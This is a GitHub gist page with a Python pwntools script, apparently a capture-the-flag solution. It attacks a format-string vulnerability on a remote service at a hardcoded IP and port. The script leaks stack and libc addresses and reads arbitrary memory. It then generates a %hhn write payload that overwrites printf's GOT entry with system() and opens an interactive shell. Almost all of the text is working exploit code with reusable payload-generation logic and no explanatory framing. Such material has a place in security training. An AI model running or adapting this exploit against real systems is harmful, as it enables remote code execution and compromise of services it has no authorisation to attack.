Skip to content

Instantly share code, notes, and snippets.

@vesim987

vesim987/espr.py

Created December 29, 2016 21:12
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save vesim987/0c0235c8049374cf71da46de25d4b1a3 to your computer and use it in GitHub Desktop.
Save vesim987/0c0235c8049374cf71da46de25d4b1a3 to your computer and use it in GitHub Desktop.
Download ZIP
Raw
espr.py
from pwn import *
host = '78.46.224.86'
port = 1337
context.os = 'linux'
context.arch = 'amd64'
p = remote(host, port)
def dump_stack(at=None, n=2048):
pl = ""
if at:
for i in range(n // 8):
pl += "%{}$p.".format(at + i)
else:
pl = ".%p" * (n // 8)
pl += "END"
p.sendline(pl)
x = p.readuntil("END")[:-3].strip().strip(".")
stack_leak = x.split(".")[1:]
stack_leak = map(lambda y: 0 if "nil" in y else int(y, 16), stack_leak)
return stack_leak
def fmtleaker(addr):
log.debug("leaking addr 0x{:x}".format(addr))
vp = None
for i in range(3):
try:
#vp = remote(host, port)
pl = "AAAA%8$s.ENDBBBB"
pl += p64(addr)
if "\n" in pl:
log.warning("newline in payload!")
return None
p.sendline(pl)
x = p.recv(1024)
if x:
f = x.find("AAAA") + 4
l = x.find(".ENDBBBB")
res = x[f:l]
if res == "":
return "\x00"
else:
return res
return None
except KeyboardInterrupt:
raise
except EOFError:
log.debug("got EOF for leaking addr 0x{:x}".format(addr))
pass
except Exception:
log.warning("got exception...", exc_info=sys.exc_info())
finally:
if vp:
vp.close()
return None
def print_got():
for off in range(3):
leaked = ''
while len(leaked) < 8:
addr = bin_got_addr + len(leaked)
x = fmtleaker(addr+off*8)
if x:
leaked += x
else:
leaked += "\xff"
#log.info(hexdump(leaked))
print hex(bin_got_addr+off*8) + ": " + hex(u64(leaked[:8]))
bin_addr = 0x400000
bin_got_addr = bin_addr + 0x201000
printf_got = bin_got_addr + 0x18
offset___libc_start_main_ret = 0x203f1
offset_system = 0x00000000000456d0
offset_dup2 = 0x00000000000f8380
offset_read = 0x00000000000f7c60
offset_write = 0x00000000000f7cc0
offset_str_bin_sh = 0x189fc0
offset_puts = 0x0000000000070960
libc_index = 37
stack = dump_stack(libc_index, 16)
libc_stack = stack[0]
libc_address = libc_stack - offset___libc_start_main_ret
libc_bin_sh = libc_address + offset_str_bin_sh
libc_system = libc_address + offset_system
libc_puts = libc_address + offset_puts
log.info("libc_address: " + hex(libc_address))
log.info("libc_bin_sh: {}({})".format(hex(libc_bin_sh), fmtleaker(libc_bin_sh)))
log.info("libc_system: " + hex(libc_system))
log.info("bin_got_addr: " + hex(bin_got_addr))
log.info("printf_got: " + hex(printf_got))
log.info("got befor:")
print_got()
buffer_start = 6
class PayloadGenerator:
def __init__(self, index=0):
self.mem = []
self.index = index
def write(self, where, what):
for i in xrange(5):
self.mem.append((where + i, (int(what) >> (i * 8)) & 0xFF))
def payload_len(self):
mem = self.mem
payload = ''
mem.sort(key=operator.itemgetter(1))
printed = 0
index = 10 #dummy value
for addr, value in mem:
if value != printed:
if value - printed > 8:
payload += "%." + str(value - printed) + "x"
else:
payload += "A" * (value - printed)
printed = value
payload += "%" + str(index + self.index) + "$hhn"
index += 1
payload += "A" * (8 - (len(payload) % 8))
return len(payload)
def gen(self):
mem = self.mem
payload = ''
mem.sort(key=operator.itemgetter(1))
printed = 0
index = self.payload_len() / 8
for addr, value in mem:
if value != printed:
if value - printed > 8:
payload += "%." + str(value - printed) + "x"
else:
payload += "A" * (value - printed)
printed = value
payload += "%" + str(index + self.index) + "$hhn"
index += 1
payload += "A" * (8 - (len(payload) % 8))
for addr, value in mem:
payload += p64(addr)
return payload
gen = PayloadGenerator(buffer_start)
gen.write(printf_got, libc_system)
payload = gen.gen()
print hexdump(payload, width=8)
p.sendline(payload)
print p.recv(1024)
p.interactive()
log.info("got after: ")
print_got()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment